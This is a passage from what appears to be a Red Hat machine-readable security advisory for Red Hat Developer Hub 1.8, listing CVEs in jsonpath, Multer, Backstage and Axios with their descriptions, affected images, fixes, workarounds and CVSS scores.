"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "jsonpath: jsonpath: Arbitrary Code Execution via unsafe JSON Path expression evaluation"
},
{
"cve": "CVE-2026-2359",
"cwe": {
"id": "CWE-772",
"name": "Missing Release of Resource after Effective Lifetime"
},
"discovery_date": "2026-02-27T16:01:27.340094+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2443350"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Multer, a Node.js middleware for handling `multipart/form-data`. A remote attacker can exploit this vulnerability by intentionally dropping a connection during a file upload. This can lead to a Denial of Service (DoS) due to resource exhaustion on the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "multer: Multer: Denial of Service via dropped file upload connections",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-2359"
},
{
"category": "external",
"summary": "RHBZ#2443350",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443350"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-2359",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2359"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-2359",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2359"
},
{
"category": "external",
"summary": "https://cna.openjsf.org/security-advisories.html",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"category": "external",
"summary": "https://github.com/expressjs/multer/commit/cccf0fe0e64150c4f42ccf6654165c0d66b9adab",
"url": "https://github.com/expressjs/multer/commit/cccf0fe0e64150c4f42ccf6654165c0d66b9adab"
},
{
"category": "external",
"summary": "https://github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc",
"url": "https://github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc"
}
],
"release_date": "2026-02-27T15:42:08.088000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:51:47+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "multer: Multer: Denial of Service via dropped file upload connections"
},
{
"cve": "CVE-2026-3304",
"cwe": {
"id": "CWE-459",
"name": "Incomplete Cleanup"
},
"discovery_date": "2026-02-27T16:01:39.674165+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2443353"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Multer, a Node.js middleware. A remote attacker could exploit this vulnerability by sending specially crafted malformed requests. This could lead to resource exhaustion, resulting in a Denial of Service (DoS) for the application using Multer.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "multer: Multer: Denial of Service via malformed requests",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-3304"
},
{
"category": "external",
"summary": "RHBZ#2443353",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443353"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-3304",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3304"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-3304",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3304"
},
{
"category": "external",
"summary": "https://cna.openjsf.org/security-advisories.html",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"category": "external",
"summary": "https://github.com/expressjs/multer/commit/739919097dde3921ec31b930e4b9025036fa74ee",
"url": "https://github.com/expressjs/multer/commit/739919097dde3921ec31b930e4b9025036fa74ee"
},
{
"category": "external",
"summary": "https://github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p",
"url": "https://github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p"
}
],
"release_date": "2026-02-27T15:44:37.187000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:51:47+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "multer: Multer: Denial of Service via malformed requests"
},
{
"cve": "CVE-2026-3520",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-03-04T17:01:43.432970+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2444584"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw was found in Multer, a Node.js middleware for handling `multipart/form-data`. A remote attacker can send specially crafted malformed requests which may induce a stack overflow. This can lead to a Denial of Service (DoS) making the service unavailable.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "multer: Multer: Denial of Service via malformed requests",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-3520"
},
{
"category": "external",
"summary": "RHBZ#2444584",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444584"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-3520",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3520"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-3520",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3520"
},
{
"category": "external",
"summary": "https://cna.openjsf.org/security-advisories.html",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"category": "external",
"summary": "https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752",
"url": "https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752"
},
{
"category": "external",
"summary": "https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2",
"url": "https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2"
}
],
"release_date": "2026-03-04T16:17:18.962000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:51:47+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "multer: Multer: Denial of Service via malformed requests"
},
{
"cve": "CVE-2026-24046",
"cwe": {
"id": "CWE-59",
"name": "Improper Link Resolution Before File Access (\u0027Link Following\u0027)"
},
"discovery_date": "2026-01-21T23:00:53.856026+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2431878"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Backstage. A symlink-based path traversal issue can be exploited in multiple Scaffolder actions and archive extraction utilities during template execution via malicious symlinks. An attacker with access to create and execute Scaffolder templates can read sensitive files, delete arbitrary files or write files outside the intended workspace, resulting in unauthorized information disclosure or system compromise.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "backstage/backend-defaults: backstage/plugin-scaffolder-backend: backstage/plugin-scaffolder-node: possible symlink path traversal in scaffolder actions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, an attacker needs to have access to create and execute Scaffolder actions, specifically the debug:log, fs:delete actions and archive extractions, limiting the exposure of this flaw. Additionally, file systems operations are constrained by the permissions of the process, limiting the impact to files that can be accessed by Backstage. Due to these reasons, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-24046"
},
{
"category": "external",
"summary": "RHBZ#2431878",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431878"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-24046",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24046"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-24046",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24046"
},
{
"category": "external",
"summary": "https://github.com/backstage/backstage/commit/c641c147ab371a9a8a2f5f67fdb7cb9c97ef345d",
"url": "https://github.com/backstage/backstage/commit/c641c147ab371a9a8a2f5f67fdb7cb9c97ef345d"
},
{
"category": "external",
"summary": "https://github.com/backstage/backstage/security/advisories/GHSA-rq6q-wr2q-7pgp",
"url": "https://github.com/backstage/backstage/security/advisories/GHSA-rq6q-wr2q-7pgp"
}
],
"release_date": "2026-01-21T22:36:30.794000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:51:47+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
},
{
"category": "workaround",
"details": "To mitigate this issue, consider implementing strict access controls for Backstage Scaffolder templates. Restrict the ability to create and execute Scaffolder templates to trusted users only, utilizing the Backstage permissions framework. Additionally, audit existing templates for any symlink usage and consider running Backstage within a containerized environment with a highly restricted filesystem to limit potential impact.",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "backstage/backend-defaults: backstage/plugin-scaffolder-backend: backstage/plugin-scaffolder-node: possible symlink path traversal in scaffolder actions"
},
{
"cve": "CVE-2026-25153",
"cwe": {
"id": "CWE-94",
"name": "Improper Control of Generation of Code (\u0027Code Injection\u0027)"
},
"discovery_date": "2026-01-30T22:00:57.084320+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2435576"
}
],
"notes": [
{
"category": "description",
"text": "A code injection flaw has been discovered in the npm @backstage/plugin-techdocs-node library. When TechDocs is configured with `runIn: local`, a malicious actor who can submit or modify a repository\u0027s `mkdocs.yml` file can execute arbitrary Python code on the TechDocs build server via MkDocs hooks configuration.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "@backstage/plugin-techdocs-node: @backstage/plugin-techdocs-node vulnerable to arbitrary code execution via MkDocs hooks",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25153"
},
{
"category": "external",
"summary": "RHBZ#2435576",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2435576"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25153",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25153"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25153",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25153"
},
{
"category": "external",
"summary": "https://github.com/backstage/backstage/security/advisories/GHSA-6jr7-99pf-8vgf",
"url": "https://github.com/backstage/backstage/security/advisories/GHSA-6jr7-99pf-8vgf"
}
],
"release_date": "2026-01-30T21:31:58.870000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:51:47+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "@backstage/plugin-techdocs-node: @backstage/plugin-techdocs-node vulnerable to arbitrary code execution via MkDocs hooks"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
